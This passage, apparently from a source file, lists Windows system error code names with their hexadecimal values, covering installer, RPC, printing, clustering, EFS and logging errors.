INDEX_ABSENT = 0x064B + INSTALL_SOURCE_ABSENT = 0x064C + INSTALL_PACKAGE_VERSION = 0x064D + PRODUCT_UNINSTALLED = 0x064E + BAD_QUERY_SYNTAX = 0x064F + INVALID_FIELD = 0x0650 + DEVICE_REMOVED = 0x0651 + INSTALL_ALREADY_RUNNING = 0x0652 + INSTALL_PACKAGE_OPEN_FAILED = 0x0653 + INSTALL_PACKAGE_INVALID = 0x0654 + INSTALL_UI_FAILURE = 0x0655 + INSTALL_LOG_FAILURE = 0x0656 + INSTALL_LANGUAGE_UNSUPPORTED = 0x0657 + INSTALL_TRANSFORM_FAILURE = 0x0658 + INSTALL_PACKAGE_REJECTED = 0x0659 + FUNCTION_NOT_CALLED = 0x065A + FUNCTION_FAILED = 0x065B + INVALID_TABLE = 0x065C + DATATYPE_MISMATCH = 0x065D + UNSUPPORTED_TYPE = 0x065E + CREATE_FAILED = 0x065F + INSTALL_TEMP_UNWRITABLE = 0x0660 + INSTALL_PLATFORM_UNSUPPORTED = 0x0661 + INSTALL_NOTUSED = 0x0662 + PATCH_PACKAGE_OPEN_FAILED = 0x0663 + PATCH_PACKAGE_INVALID = 0x0664 + PATCH_PACKAGE_UNSUPPORTED = 0x0665 + PRODUCT_VERSION = 0x0666 + INVALID_COMMAND_LINE = 0x0667 + INSTALL_REMOTE_DISALLOWED = 0x0668 + SUCCESS_REBOOT_INITIATED = 0x0669 + PATCH_TARGET_NOT_FOUND = 0x066A + PATCH_PACKAGE_REJECTED = 0x066B + INSTALL_TRANSFORM_REJECTED = 0x066C + INSTALL_REMOTE_PROHIBITED = 0x066D + PATCH_REMOVAL_UNSUPPORTED = 0x066E + UNKNOWN_PATCH = 0x066F + PATCH_NO_SEQUENCE = 0x0670 + PATCH_REMOVAL_DISALLOWED = 0x0671 + INVALID_PATCH_XML = 0x0672 + PATCH_MANAGED_ADVERTISED_PRODUCT = 0x0673 + INSTALL_SERVICE_SAFEBOOT = 0x0674 + FAIL_FAST_EXCEPTION = 0x0675 + RPC_S_INVALID_STRING_BINDING = 0x06A4 + RPC_S_WRONG_KIND_OF_BINDING = 0x06A5 + RPC_S_INVALID_BINDING = 0x06A6 + RPC_S_PROTSEQ_NOT_SUPPORTED = 0x06A7 + RPC_S_INVALID_RPC_PROTSEQ = 0x06A8 + RPC_S_INVALID_STRING_UUID = 0x06A9 + RPC_S_INVALID_ENDPOINT_FORMAT = 0x06AA + RPC_S_INVALID_NET_ADDR = 0x06AB + RPC_S_NO_ENDPOINT_FOUND = 0x06AC + RPC_S_INVALID_TIMEOUT = 0x06AD + RPC_S_OBJECT_NOT_FOUND = 0x06AE + RPC_S_ALREADY_REGISTERED = 0x06AF + RPC_S_TYPE_ALREADY_REGISTERED = 0x06B0 + RPC_S_ALREADY_LISTENING = 0x06B1 + RPC_S_NO_PROTSEQS_REGISTERED = 0x06B2 + RPC_S_NOT_LISTENING = 0x06B3 + RPC_S_UNKNOWN_MGR_TYPE = 0x06B4 + RPC_S_UNKNOWN_IF = 0x06B5 + RPC_S_NO_BINDINGS = 0x06B6 + RPC_S_NO_PROTSEQS = 0x06B7 + RPC_S_CANT_CREATE_ENDPOINT = 0x06B8 + RPC_S_OUT_OF_RESOURCES = 0x06B9 + RPC_S_SERVER_UNAVAILABLE = 0x06BA + RPC_S_SERVER_TOO_BUSY = 0x06BB + RPC_S_INVALID_NETWORK_OPTIONS = 0x06BC + RPC_S_NO_CALL_ACTIVE = 0x06BD + RPC_S_CALL_FAILED = 0x06BE + RPC_S_CALL_FAILED_DNE = 0x06BF + RPC_S_PROTOCOL_ERROR = 0x06C0 + RPC_S_PROXY_ACCESS_DENIED = 0x06C1 + RPC_S_UNSUPPORTED_TRANS_SYN = 0x06C2 + RPC_S_UNSUPPORTED_TYPE = 0x06C4 + RPC_S_INVALID_TAG = 0x06C5 + RPC_S_INVALID_BOUND = 0x06C6 + RPC_S_NO_ENTRY_NAME = 0x06C7 + RPC_S_INVALID_NAME_SYNTAX = 0x06C8 + RPC_S_UNSUPPORTED_NAME_SYNTAX = 0x06C9 + RPC_S_UUID_NO_ADDRESS = 0x06CB + RPC_S_DUPLICATE_ENDPOINT = 0x06CC + RPC_S_UNKNOWN_AUTHN_TYPE = 0x06CD + RPC_S_MAX_CALLS_TOO_SMALL = 0x06CE + RPC_S_STRING_TOO_LONG = 0x06CF + RPC_S_PROTSEQ_NOT_FOUND = 0x06D0 + RPC_S_PROCNUM_OUT_OF_RANGE = 0x06D1 + RPC_S_BINDING_HAS_NO_AUTH = 0x06D2 + RPC_S_UNKNOWN_AUTHN_SERVICE = 0x06D3 + RPC_S_UNKNOWN_AUTHN_LEVEL = 0x06D4 + RPC_S_INVALID_AUTH_IDENTITY = 0x06D5 + RPC_S_UNKNOWN_AUTHZ_SERVICE = 0x06D6 + EPT_S_INVALID_ENTRY = 0x06D7 + EPT_S_CANT_PERFORM_OP = 0x06D8 + EPT_S_NOT_REGISTERED = 0x06D9 + RPC_S_NOTHING_TO_EXPORT = 0x06DA + RPC_S_INCOMPLETE_NAME = 0x06DB + RPC_S_INVALID_VERS_OPTION = 0x06DC + RPC_S_NO_MORE_MEMBERS = 0x06DD + RPC_S_NOT_ALL_OBJS_UNEXPORTED = 0x06DE + RPC_S_INTERFACE_NOT_FOUND = 0x06DF + RPC_S_ENTRY_ALREADY_EXISTS = 0x06E0 + RPC_S_ENTRY_NOT_FOUND = 0x06E1 + RPC_S_NAME_SERVICE_UNAVAILABLE = 0x06E2 + RPC_S_INVALID_NAF_ID = 0x06E3 + RPC_S_CANNOT_SUPPORT = 0x06E4 + RPC_S_NO_CONTEXT_AVAILABLE = 0x06E5 + RPC_S_INTERNAL_ERROR = 0x06E6 + RPC_S_ZERO_DIVIDE = 0x06E7 + RPC_S_ADDRESS_ERROR = 0x06E8 + RPC_S_FP_DIV_ZERO = 0x06E9 + RPC_S_FP_UNDERFLOW = 0x06EA + RPC_S_FP_OVERFLOW = 0x06EB + RPC_X_NO_MORE_ENTRIES = 0x06EC + RPC_X_SS_CHAR_TRANS_OPEN_FAIL = 0x06ED + RPC_X_SS_CHAR_TRANS_SHORT_FILE = 0x06EE + RPC_X_SS_IN_NULL_CONTEXT = 0x06EF + RPC_X_SS_CONTEXT_DAMAGED = 0x06F1 + RPC_X_SS_HANDLES_MISMATCH = 0x06F2 + RPC_X_SS_CANNOT_GET_CALL_HANDLE = 0x06F3 + RPC_X_NULL_REF_POINTER = 0x06F4 + RPC_X_ENUM_VALUE_OUT_OF_RANGE = 0x06F5 + RPC_X_BYTE_COUNT_TOO_SMALL = 0x06F6 + RPC_X_BAD_STUB_DATA = 0x06F7 + INVALID_USER_BUFFER = 0x06F8 + UNRECOGNIZED_MEDIA = 0x06F9 + NO_TRUST_LSA_SECRET = 0x06FA + NO_TRUST_SAM_ACCOUNT = 0x06FB + TRUSTED_DOMAIN_FAILURE = 0x06FC + TRUSTED_RELATIONSHIP_FAILURE = 0x06FD + TRUST_FAILURE = 0x06FE + RPC_S_CALL_IN_PROGRESS = 0x06FF + NETLOGON_NOT_STARTED = 0x0700 + ACCOUNT_EXPIRED = 0x0701 + REDIRECTOR_HAS_OPEN_HANDLES = 0x0702 + PRINTER_DRIVER_ALREADY_INSTALLED = 0x0703 + UNKNOWN_PORT = 0x0704 + UNKNOWN_PRINTER_DRIVER = 0x0705 + UNKNOWN_PRINTPROCESSOR = 0x0706 + INVALID_SEPARATOR_FILE = 0x0707 + INVALID_PRIORITY = 0x0708 + INVALID_PRINTER_NAME = 0x0709 + PRINTER_ALREADY_EXISTS = 0x070A + INVALID_PRINTER_COMMAND = 0x070B + INVALID_DATATYPE = 0x070C + INVALID_ENVIRONMENT = 0x070D + RPC_S_NO_MORE_BINDINGS = 0x070E + NOLOGON_INTERDOMAIN_TRUST_ACCOUNT = 0x070F + NOLOGON_WORKSTATION_TRUST_ACCOUNT = 0x0710 + NOLOGON_SERVER_TRUST_ACCOUNT = 0x0711 + DOMAIN_TRUST_INCONSISTENT = 0x0712 + SERVER_HAS_OPEN_HANDLES = 0x0713 + RESOURCE_DATA_NOT_FOUND = 0x0714 + RESOURCE_TYPE_NOT_FOUND = 0x0715 + RESOURCE_NAME_NOT_FOUND = 0x0716 + RESOURCE_LANG_NOT_FOUND = 0x0717 + NOT_ENOUGH_QUOTA = 0x0718 + RPC_S_NO_INTERFACES = 0x0719 + RPC_S_CALL_CANCELLED = 0x071A + RPC_S_BINDING_INCOMPLETE = 0x071B + RPC_S_COMM_FAILURE = 0x071C + RPC_S_UNSUPPORTED_AUTHN_LEVEL = 0x071D + RPC_S_NO_PRINC_NAME = 0x071E + RPC_S_NOT_RPC_ERROR = 0x071F + RPC_S_UUID_LOCAL_ONLY = 0x0720 + RPC_S_SEC_PKG_ERROR = 0x0721 + RPC_S_NOT_CANCELLED = 0x0722 + RPC_X_INVALID_ES_ACTION = 0x0723 + RPC_X_WRONG_ES_VERSION = 0x0724 + RPC_X_WRONG_STUB_VERSION = 0x0725 + RPC_X_INVALID_PIPE_OBJECT = 0x0726 + RPC_X_WRONG_PIPE_ORDER = 0x0727 + RPC_X_WRONG_PIPE_VERSION = 0x0728 + RPC_S_COOKIE_AUTH_FAILED = 0x0729 + RPC_S_GROUP_MEMBER_NOT_FOUND = 0x076A + EPT_S_CANT_CREATE = 0x076B + RPC_S_INVALID_OBJECT = 0x076C + INVALID_TIME = 0x076D + INVALID_FORM_NAME = 0x076E + INVALID_FORM_SIZE = 0x076F + ALREADY_WAITING = 0x0770 + PRINTER_DELETED = 0x0771 + INVALID_PRINTER_STATE = 0x0772 + PASSWORD_MUST_CHANGE = 0x0773 + DOMAIN_CONTROLLER_NOT_FOUND = 0x0774 + ACCOUNT_LOCKED_OUT = 0x0775 + OR_INVALID_OXID = 0x0776 + OR_INVALID_OID = 0x0777 + OR_INVALID_SET = 0x0778 + RPC_S_SEND_INCOMPLETE = 0x0779 + RPC_S_INVALID_ASYNC_HANDLE = 0x077A + RPC_S_INVALID_ASYNC_CALL = 0x077B + RPC_X_PIPE_CLOSED = 0x077C + RPC_X_PIPE_DISCIPLINE_ERROR = 0x077D + RPC_X_PIPE_EMPTY = 0x077E + NO_SITENAME = 0x077F + CANT_ACCESS_FILE = 0x0780 + CANT_RESOLVE_FILENAME = 0x0781 + RPC_S_ENTRY_TYPE_MISMATCH = 0x0782 + RPC_S_NOT_ALL_OBJS_EXPORTED = 0x0783 + RPC_S_INTERFACE_NOT_EXPORTED = 0x0784 + RPC_S_PROFILE_NOT_ADDED = 0x0785 + RPC_S_PRF_ELT_NOT_ADDED = 0x0786 + RPC_S_PRF_ELT_NOT_REMOVED = 0x0787 + RPC_S_GRP_ELT_NOT_ADDED = 0x0788 + RPC_S_GRP_ELT_NOT_REMOVED = 0x0789 + KM_DRIVER_BLOCKED = 0x078A + CONTEXT_EXPIRED = 0x078B + PER_USER_TRUST_QUOTA_EXCEEDED = 0x078C + ALL_USER_TRUST_QUOTA_EXCEEDED = 0x078D + USER_DELETE_TRUST_QUOTA_EXCEEDED = 0x078E + AUTHENTICATION_FIREWALL_FAILED = 0x078F + REMOTE_PRINT_CONNECTIONS_BLOCKED = 0x0790 + NTLM_BLOCKED = 0x0791 + INVALID_PIXEL_FORMAT = 0x07D0 + BAD_DRIVER = 0x07D1 + INVALID_WINDOW_STYLE = 0x07D2 + METAFILE_NOT_SUPPORTED = 0x07D3 + TRANSFORM_NOT_SUPPORTED = 0x07D4 + CLIPPING_NOT_SUPPORTED = 0x07D5 + INVALID_CMM = 0x07DA + INVALID_PROFILE = 0x07DB + TAG_NOT_FOUND = 0x07DC + TAG_NOT_PRESENT = 0x07DD + DUPLICATE_TAG = 0x07DE + PROFILE_NOT_ASSOCIATED_WITH_DEVICE = 0x07DF + PROFILE_NOT_FOUND = 0x07E0 + INVALID_COLORSPACE = 0x07E1 + ICM_NOT_ENABLED = 0x07E2 + DELETING_ICM_XFORM = 0x07E3 + INVALID_TRANSFORM = 0x07E4 + COLORSPACE_MISMATCH = 0x07E5 + INVALID_COLORINDEX = 0x07E6 + PROFILE_DOES_NOT_MATCH_DEVICE = 0x07E7 + CONNECTED_OTHER_PASSWORD = 0x083C + CONNECTED_OTHER_PASSWORD_DEFAULT = 0x083D + BAD_USERNAME = 0x089A + NOT_CONNECTED = 0x08CA + OPEN_FILES = 0x0961 + ACTIVE_CONNECTIONS = 0x0962 + DEVICE_IN_USE = 0x0964 + UNKNOWN_PRINT_MONITOR = 0x0BB8 + PRINTER_DRIVER_IN_USE = 0x0BB9 + SPOOL_FILE_NOT_FOUND = 0x0BBA + SPL_NO_STARTDOC = 0x0BBB + SPL_NO_ADDJOB = 0x0BBC + PRINT_PROCESSOR_ALREADY_INSTALLED = 0x0BBD + PRINT_MONITOR_ALREADY_INSTALLED = 0x0BBE + INVALID_PRINT_MONITOR = 0x0BBF + PRINT_MONITOR_IN_USE = 0x0BC0 + PRINTER_HAS_JOBS_QUEUED = 0x0BC1 + SUCCESS_REBOOT_REQUIRED = 0x0BC2 + SUCCESS_RESTART_REQUIRED = 0x0BC3 + PRINTER_NOT_FOUND = 0x0BC4 + PRINTER_DRIVER_WARNED = 0x0BC5 + PRINTER_DRIVER_BLOCKED = 0x0BC6 + PRINTER_DRIVER_PACKAGE_IN_USE = 0x0BC7 + CORE_DRIVER_PACKAGE_NOT_FOUND = 0x0BC8 + FAIL_REBOOT_REQUIRED = 0x0BC9 + FAIL_REBOOT_INITIATED = 0x0BCA + PRINTER_DRIVER_DOWNLOAD_NEEDED = 0x0BCB + PRINT_JOB_RESTART_REQUIRED = 0x0BCC + IO_REISSUE_AS_CACHED = 0x0F6E + WINS_INTERNAL = 0x0FA0 + CAN_NOT_DEL_LOCAL_WINS = 0x0FA1 + STATIC_INIT = 0x0FA2 + INC_BACKUP = 0x0FA3 + FULL_BACKUP = 0x0FA4 + REC_NON_EXISTENT = 0x0FA5 + RPL_NOT_ALLOWED = 0x0FA6 + PEERDIST_CONTENTINFO_VERSION_UNSUPPORTED = 0x0FD2 + PEERDIST_CANNOT_PARSE_CONTENTINFO = 0x0FD3 + PEERDIST_MISSING_DATA = 0x0FD4 + PEERDIST_NO_MORE = 0x0FD5 + PEERDIST_NOT_INITIALIZED = 0x0FD6 + PEERDIST_ALREADY_INITIALIZED = 0x0FD7 + PEERDIST_SHUTDOWN_IN_PROGRESS = 0x0FD8 + PEERDIST_INVALIDATED = 0x0FD9 + PEERDIST_ALREADY_EXISTS = 0x0FDA + PEERDIST_OPERATION_NOTFOUND = 0x0FDB + PEERDIST_ALREADY_COMPLETED = 0x0FDC + PEERDIST_OUT_OF_BOUNDS = 0x0FDD + PEERDIST_VERSION_UNSUPPORTED = 0x0FDE + PEERDIST_INVALID_CONFIGURATION = 0x0FDF + PEERDIST_NOT_LICENSED = 0x0FE0 + PEERDIST_SERVICE_UNAVAILABLE = 0x0FE1 + DHCP_ADDRESS_CONFLICT = 0x1004 + WMI_GUID_NOT_FOUND = 0x1068 + WMI_INSTANCE_NOT_FOUND = 0x1069 + WMI_ITEMID_NOT_FOUND = 0x106A + WMI_TRY_AGAIN = 0x106B + WMI_DP_NOT_FOUND = 0x106C + WMI_UNRESOLVED_INSTANCE_REF = 0x106D + WMI_ALREADY_ENABLED = 0x106E + WMI_GUID_DISCONNECTED = 0x106F + WMI_SERVER_UNAVAILABLE = 0x1070 + WMI_DP_FAILED = 0x1071 + WMI_INVALID_MOF = 0x1072 + WMI_INVALID_REGINFO = 0x1073 + WMI_ALREADY_DISABLED = 0x1074 + WMI_READ_ONLY = 0x1075 + WMI_SET_FAILURE = 0x1076 + INVALID_MEDIA = 0x10CC + INVALID_LIBRARY = 0x10CD + INVALID_MEDIA_POOL = 0x10CE + DRIVE_MEDIA_MISMATCH = 0x10CF + MEDIA_OFFLINE = 0x10D0 + LIBRARY_OFFLINE = 0x10D1 + EMPTY = 0x10D2 + NOT_EMPTY = 0x10D3 + MEDIA_UNAVAILABLE = 0x10D4 + RESOURCE_DISABLED = 0x10D5 + INVALID_CLEANER = 0x10D6 + UNABLE_TO_CLEAN = 0x10D7 + OBJECT_NOT_FOUND = 0x10D8 + DATABASE_FAILURE = 0x10D9 + DATABASE_FULL = 0x10DA + MEDIA_INCOMPATIBLE = 0x10DB + RESOURCE_NOT_PRESENT = 0x10DC + INVALID_OPERATION = 0x10DD + MEDIA_NOT_AVAILABLE = 0x10DE + DEVICE_NOT_AVAILABLE = 0x10DF + REQUEST_REFUSED = 0x10E0 + INVALID_DRIVE_OBJECT = 0x10E1 + LIBRARY_FULL = 0x10E2 + MEDIUM_NOT_ACCESSIBLE = 0x10E3 + UNABLE_TO_LOAD_MEDIUM = 0x10E4 + UNABLE_TO_INVENTORY_DRIVE = 0x10E5 + UNABLE_TO_INVENTORY_SLOT = 0x10E6 + UNABLE_TO_INVENTORY_TRANSPORT = 0x10E7 + TRANSPORT_FULL = 0x10E8 + CONTROLLING_IEPORT = 0x10E9 + UNABLE_TO_EJECT_MOUNTED_MEDIA = 0x10EA + CLEANER_SLOT_SET = 0x10EB + CLEANER_SLOT_NOT_SET = 0x10EC + CLEANER_CARTRIDGE_SPENT = 0x10ED + UNEXPECTED_OMID = 0x10EE + CANT_DELETE_LAST_ITEM = 0x10EF + MESSAGE_EXCEEDS_MAX_SIZE = 0x10F0 + VOLUME_CONTAINS_SYS_FILES = 0x10F1 + INDIGENOUS_TYPE = 0x10F2 + NO_SUPPORTING_DRIVES = 0x10F3 + CLEANER_CARTRIDGE_INSTALLED = 0x10F4 + IEPORT_FULL = 0x10F5 + FILE_OFFLINE = 0x10FE + REMOTE_STORAGE_NOT_ACTIVE = 0x10FF + REMOTE_STORAGE_MEDIA_ERROR = 0x1100 + NOT_A_REPARSE_POINT = 0x1126 + REPARSE_ATTRIBUTE_CONFLICT = 0x1127 + INVALID_REPARSE_DATA = 0x1128 + REPARSE_TAG_INVALID = 0x1129 + REPARSE_TAG_MISMATCH = 0x112A + VOLUME_NOT_SIS_ENABLED = 0x1194 + DEPENDENT_RESOURCE_EXISTS = 0x1389 + DEPENDENCY_NOT_FOUND = 0x138A + DEPENDENCY_ALREADY_EXISTS = 0x138B + RESOURCE_NOT_ONLINE = 0x138C + HOST_NODE_NOT_AVAILABLE = 0x138D + RESOURCE_NOT_AVAILABLE = 0x138E + RESOURCE_NOT_FOUND = 0x138F + SHUTDOWN_CLUSTER = 0x1390 + CANT_EVICT_ACTIVE_NODE = 0x1391 + OBJECT_ALREADY_EXISTS = 0x1392 + OBJECT_IN_LIST = 0x1393 + GROUP_NOT_AVAILABLE = 0x1394 + GROUP_NOT_FOUND = 0x1395 + GROUP_NOT_ONLINE = 0x1396 + HOST_NODE_NOT_RESOURCE_OWNER = 0x1397 + HOST_NODE_NOT_GROUP_OWNER = 0x1398 + RESMON_CREATE_FAILED = 0x1399 + RESMON_ONLINE_FAILED = 0x139A + RESOURCE_ONLINE = 0x139B + QUORUM_RESOURCE = 0x139C + NOT_QUORUM_CAPABLE = 0x139D + CLUSTER_SHUTTING_DOWN = 0x139E + INVALID_STATE = 0x139F + RESOURCE_PROPERTIES_STORED = 0x13A0 + NOT_QUORUM_CLASS = 0x13A1 + CORE_RESOURCE = 0x13A2 + QUORUM_RESOURCE_ONLINE_FAILED = 0x13A3 + QUORUMLOG_OPEN_FAILED = 0x13A4 + CLUSTERLOG_CORRUPT = 0x13A5 + CLUSTERLOG_RECORD_EXCEEDS_MAXSIZE = 0x13A6 + CLUSTERLOG_EXCEEDS_MAXSIZE = 0x13A7 + CLUSTERLOG_CHKPOINT_NOT_FOUND = 0x13A8 + CLUSTERLOG_NOT_ENOUGH_SPACE = 0x13A9 + QUORUM_OWNER_ALIVE = 0x13AA + NETWORK_NOT_AVAILABLE = 0x13AB + NODE_NOT_AVAILABLE = 0x13AC + ALL_NODES_NOT_AVAILABLE = 0x13AD + RESOURCE_FAILED = 0x13AE + CLUSTER_INVALID_NODE = 0x13AF + CLUSTER_NODE_EXISTS = 0x13B0 + CLUSTER_JOIN_IN_PROGRESS = 0x13B1 + CLUSTER_NODE_NOT_FOUND = 0x13B2 + CLUSTER_LOCAL_NODE_NOT_FOUND = 0x13B3 + CLUSTER_NETWORK_EXISTS = 0x13B4 + CLUSTER_NETWORK_NOT_FOUND = 0x13B5 + CLUSTER_NETINTERFACE_EXISTS = 0x13B6 + CLUSTER_NETINTERFACE_NOT_FOUND = 0x13B7 + CLUSTER_INVALID_REQUEST = 0x13B8 + CLUSTER_INVALID_NETWORK_PROVIDER = 0x13B9 + CLUSTER_NODE_DOWN = 0x13BA + CLUSTER_NODE_UNREACHABLE = 0x13BB + CLUSTER_NODE_NOT_MEMBER = 0x13BC + CLUSTER_JOIN_NOT_IN_PROGRESS = 0x13BD + CLUSTER_INVALID_NETWORK = 0x13BE + CLUSTER_NODE_UP = 0x13C0 + CLUSTER_IPADDR_IN_USE = 0x13C1 + CLUSTER_NODE_NOT_PAUSED = 0x13C2 + CLUSTER_NO_SECURITY_CONTEXT = 0x13C3 + CLUSTER_NETWORK_NOT_INTERNAL = 0x13C4 + CLUSTER_NODE_ALREADY_UP = 0x13C5 + CLUSTER_NODE_ALREADY_DOWN = 0x13C6 + CLUSTER_NETWORK_ALREADY_ONLINE = 0x13C7 + CLUSTER_NETWORK_ALREADY_OFFLINE = 0x13C8 + CLUSTER_NODE_ALREADY_MEMBER = 0x13C9 + CLUSTER_LAST_INTERNAL_NETWORK = 0x13CA + CLUSTER_NETWORK_HAS_DEPENDENTS = 0x13CB + INVALID_OPERATION_ON_QUORUM = 0x13CC + DEPENDENCY_NOT_ALLOWED = 0x13CD + CLUSTER_NODE_PAUSED = 0x13CE + NODE_CANT_HOST_RESOURCE = 0x13CF + CLUSTER_NODE_NOT_READY = 0x13D0 + CLUSTER_NODE_SHUTTING_DOWN = 0x13D1 + CLUSTER_JOIN_ABORTED = 0x13D2 + CLUSTER_INCOMPATIBLE_VERSIONS = 0x13D3 + CLUSTER_MAXNUM_OF_RESOURCES_EXCEEDED = 0x13D4 + CLUSTER_SYSTEM_CONFIG_CHANGED = 0x13D5 + CLUSTER_RESOURCE_TYPE_NOT_FOUND = 0x13D6 + CLUSTER_RESTYPE_NOT_SUPPORTED = 0x13D7 + CLUSTER_RESNAME_NOT_FOUND = 0x13D8 + CLUSTER_NO_RPC_PACKAGES_REGISTERED = 0x13D9 + CLUSTER_OWNER_NOT_IN_PREFLIST = 0x13DA + CLUSTER_DATABASE_SEQMISMATCH = 0x13DB + RESMON_INVALID_STATE = 0x13DC + CLUSTER_GUM_NOT_LOCKER = 0x13DD + QUORUM_DISK_NOT_FOUND = 0x13DE + DATABASE_BACKUP_CORRUPT = 0x13DF + CLUSTER_NODE_ALREADY_HAS_DFS_ROOT = 0x13E0 + RESOURCE_PROPERTY_UNCHANGEABLE = 0x13E1 + CLUSTER_MEMBERSHIP_INVALID_STATE = 0x1702 + CLUSTER_QUORUMLOG_NOT_FOUND = 0x1703 + CLUSTER_MEMBERSHIP_HALT = 0x1704 + CLUSTER_INSTANCE_ID_MISMATCH = 0x1705 + CLUSTER_NETWORK_NOT_FOUND_FOR_IP = 0x1706 + CLUSTER_PROPERTY_DATA_TYPE_MISMATCH = 0x1707 + CLUSTER_EVICT_WITHOUT_CLEANUP = 0x1708 + CLUSTER_PARAMETER_MISMATCH = 0x1709 + NODE_CANNOT_BE_CLUSTERED = 0x170A + CLUSTER_WRONG_OS_VERSION = 0x170B + CLUSTER_CANT_CREATE_DUP_CLUSTER_NAME = 0x170C + CLUSCFG_ALREADY_COMMITTED = 0x170D + CLUSCFG_ROLLBACK_FAILED = 0x170E + CLUSCFG_SYSTEM_DISK_DRIVE_LETTER_CONFLICT = 0x170F + CLUSTER_OLD_VERSION = 0x1710 + CLUSTER_MISMATCHED_COMPUTER_ACCT_NAME = 0x1711 + CLUSTER_NO_NET_ADAPTERS = 0x1712 + CLUSTER_POISONED = 0x1713 + CLUSTER_GROUP_MOVING = 0x1714 + CLUSTER_RESOURCE_TYPE_BUSY = 0x1715 + RESOURCE_CALL_TIMED_OUT = 0x1716 + INVALID_CLUSTER_IPV6_ADDRESS = 0x1717 + CLUSTER_INTERNAL_INVALID_FUNCTION = 0x1718 + CLUSTER_PARAMETER_OUT_OF_BOUNDS = 0x1719 + CLUSTER_PARTIAL_SEND = 0x171A + CLUSTER_REGISTRY_INVALID_FUNCTION = 0x171B + CLUSTER_INVALID_STRING_TERMINATION = 0x171C + CLUSTER_INVALID_STRING_FORMAT = 0x171D + CLUSTER_DATABASE_TRANSACTION_IN_PROGRESS = 0x171E + CLUSTER_DATABASE_TRANSACTION_NOT_IN_PROGRESS = 0x171F + CLUSTER_NULL_DATA = 0x1720 + CLUSTER_PARTIAL_READ = 0x1721 + CLUSTER_PARTIAL_WRITE = 0x1722 + CLUSTER_CANT_DESERIALIZE_DATA = 0x1723 + DEPENDENT_RESOURCE_PROPERTY_CONFLICT = 0x1724 + CLUSTER_NO_QUORUM = 0x1725 + CLUSTER_INVALID_IPV6_NETWORK = 0x1726 + CLUSTER_INVALID_IPV6_TUNNEL_NETWORK = 0x1727 + QUORUM_NOT_ALLOWED_IN_THIS_GROUP = 0x1728 + DEPENDENCY_TREE_TOO_COMPLEX = 0x1729 + EXCEPTION_IN_RESOURCE_CALL = 0x172A + CLUSTER_RHS_FAILED_INITIALIZATION = 0x172B + CLUSTER_NOT_INSTALLED = 0x172C + CLUSTER_RESOURCES_MUST_BE_ONLINE_ON_THE_SAME_NODE = 0x172D + CLUSTER_MAX_NODES_IN_CLUSTER = 0x172E + CLUSTER_TOO_MANY_NODES = 0x172F + CLUSTER_OBJECT_ALREADY_USED = 0x1730 + NONCORE_GROUPS_FOUND = 0x1731 + FILE_SHARE_RESOURCE_CONFLICT = 0x1732 + CLUSTER_EVICT_INVALID_REQUEST = 0x1733 + CLUSTER_SINGLETON_RESOURCE = 0x1734 + CLUSTER_GROUP_SINGLETON_RESOURCE = 0x1735 + CLUSTER_RESOURCE_PROVIDER_FAILED = 0x1736 + CLUSTER_RESOURCE_CONFIGURATION_ERROR = 0x1737 + CLUSTER_GROUP_BUSY = 0x1738 + CLUSTER_NOT_SHARED_VOLUME = 0x1739 + CLUSTER_INVALID_SECURITY_DESCRIPTOR = 0x173A + CLUSTER_SHARED_VOLUMES_IN_USE = 0x173B + CLUSTER_USE_SHARED_VOLUMES_API = 0x173C + CLUSTER_BACKUP_IN_PROGRESS = 0x173D + NON_CSV_PATH = 0x173E + CSV_VOLUME_NOT_LOCAL = 0x173F + CLUSTER_WATCHDOG_TERMINATING = 0x1740 + ENCRYPTION_FAILED = 0x1770 + DECRYPTION_FAILED = 0x1771 + FILE_ENCRYPTED = 0x1772 + NO_RECOVERY_POLICY = 0x1773 + NO_EFS = 0x1774 + WRONG_EFS = 0x1775 + NO_USER_KEYS = 0x1776 + FILE_NOT_ENCRYPTED = 0x1777 + NOT_EXPORT_FORMAT = 0x1778 + FILE_READ_ONLY = 0x1779 + DIR_EFS_DISALLOWED = 0x177A + EFS_SERVER_NOT_TRUSTED = 0x177B + BAD_RECOVERY_POLICY = 0x177C + EFS_ALG_BLOB_TOO_BIG = 0x177D + VOLUME_NOT_SUPPORT_EFS = 0x177E + EFS_DISABLED = 0x177F + EFS_VERSION_NOT_SUPPORT = 0x1780 + CS_ENCRYPTION_INVALID_SERVER_RESPONSE = 0x1781 + CS_ENCRYPTION_UNSUPPORTED_SERVER = 0x1782 + CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE = 0x1783 + CS_ENCRYPTION_NEW_ENCRYPTED_FILE = 0x1784 + CS_ENCRYPTION_FILE_NOT_CSE = 0x1785 + NO_BROWSER_SERVERS_FOUND = 0x17E6 + SCHED_E_SERVICE_NOT_LOCALSYSTEM = 0x1838 + LOG_SECTOR_INVALID = 0x19C8 + LOG_SECTOR_PARITY_INVALID = 0x19C9 + LOG_SECTOR_REMAPPED = 0x19CA + LOG_BLOCK_INCOMPLETE = 0x19CB + LOG_INVALID_RANGE = 0x19CC + LOG_BLOCKS_EXHAUSTED = 0x19CD + LOG_READ_CONTEXT_INVALID = 0x19CE + LOG_RESTART_INVALID = 0x19CF + LOG_BLOCK_VERSION = 0x19D0 + LOG_BLOCK_INVALID = 0x19D1 + LOG_READ_MODE_INVALID = 0x19D2 + LOG_NO_RESTART = 0x19D3 + LOG_METADATA_CORRUPT = 0x19D4 + LOG_METADATA_INVALID = 0x19D5 + LOG_METADATA_INCONSISTENT = 0x19D6 + LOG_RESERVATION_INVALID = 0x19D7 + LOG_CANT_DELETE = 0x19D8 + LOG_CONTAINER_LIMIT_EXCEEDED = 0x19D9 + LOG_START_OF_LOG = 0x19DA + LOG_POLICY_ALREADY_INSTALLED = 0x19DB + LOG_POLICY_NOT_INSTALLED = 0x19DC + LOG_POLICY_INVALID = 0x19DD + LOG_POLICY_CONFLICT = 0x19DE + LOG_PINNED_ARCHIVE_TAIL = 0x19DF + LOG_RECORD_NONEXISTENT = 0x19E0 + LOG_RECORDS_RESERVED_INVALID = 0x19E1 + LOG_SPACE_RESERVED_INVALID = 0x19E2 + LOG_TAIL_INVALID = 0x19E3 + LOG_FULL = 0x19E4 + COULD_NOT_RESIZE_LOG = 0x19E5 + LOG_MULTIPLEXED = 0x19E6 + LOG_DEDICATED = 0x19E7 + LOG_ARCHIVE_NOT_IN_PROGRESS = 0x19E8 + LOG_ARCHIVE_IN_PROGRESS = 0x19E9 + LOG_EPHEMERAL = 0x19EA + LOG_NOT_ENOUGH_CONTAINERS = 0x19EB + LOG_CLIENT_ALREADY_REGISTERED = 0x19EC + LOG_CLIENT_NOT_REGISTERED = 0x19ED + 